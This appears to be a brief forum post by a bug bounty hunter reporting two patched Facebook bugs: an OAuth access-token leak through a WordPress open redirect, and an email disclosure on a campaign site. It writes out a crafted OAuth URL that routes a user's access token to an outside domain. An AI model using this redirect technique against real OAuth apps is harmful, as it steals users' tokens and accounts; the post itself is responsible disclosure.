Facebook Awards 1000$ for 2 minor bugs

6 points

10 years ago

Since last two month i started reading about security vulnerabilities and give a try on facebook.com and found two minor bugs.

BUG #1 STEALING OAUTH ACCESS TOKEN (500$)

Introduction: -------------- Facebook apps(including facebook internal apps) having redirect_url to wordpress comes under this attack.It was because of open redirection bug of wordpress sites

Steps: -------

1. Facebook launched shemeansbusiness.fb.com (client_id=757713104362213).By Default redirect_url was https://staticxx.facebook.com/connect/xd_arbiter.php

2. App accept shemeansbusiness.fb.com domain in redirect_url and also fbshemeansbusiness.wordpress.com

3. So, I crafted a new url :

https://www.facebook.com/dialog/oauth?display=page&response_type=token&fbconnect=1&client_id=757713104362213&redirect_uri=https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com

Here Redirect Url is :

https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com

4. So If any person has pre authorized this app or use it first time using crafted url, the access token will be redirected to external websites(having google or wordpress keyword in domain)

5. Even techcrunch.com has open redirection and send access token to external websites

BUG #2: EMAIL DISCLOSURE of users who submitted link on shemeansbusiness.fb.com. (500$)

Like this url was disclosing user email https://shemeansbusiness.fb.com/fbsmb_submission/lea-rafferty/

Both the bugs are patched immediately.Today facebook awards me total 1000$ for these two bugs

2 comments